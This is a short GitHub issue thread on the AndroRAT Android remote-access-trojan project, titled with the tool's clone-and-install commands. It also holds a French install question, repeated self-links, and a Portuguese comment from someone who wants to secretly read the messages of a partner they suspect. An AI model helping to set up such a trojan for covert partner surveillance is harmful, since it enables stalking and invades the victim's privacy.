### ISSUE TITLE
git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT
pip install -r requirements.txt


### ISSUE THREAD

**Issue by Clone23er** [karma9874/AndroRAT#314]

**Comment by jacobsagno571-ctrl** [comment]
comment installer le logiciel dans pc

**Comment by sl8001499-a11y** [comment]
Gosto de ver as conversas de uma pessoa que eu estou ficando com essa pessoa, está pessoa tá muito suspeita então eu quero ver oque essa pessoa está aprontando comigo.

**Comment by taufiqjongger2728-ctrl** [comment]
https://github.com/karma9874/AndroRAT/issues/314

**Comment by taufiqjongger2728-ctrl** [comment]
https://github.com/karma9874/AndroRAT/issues/314#issuecomment-5527496506

**Comment by taufiqjongger2728-ctrl** [comment]
[](url)https://github.com/karma9874/AndroRAT/issues/314
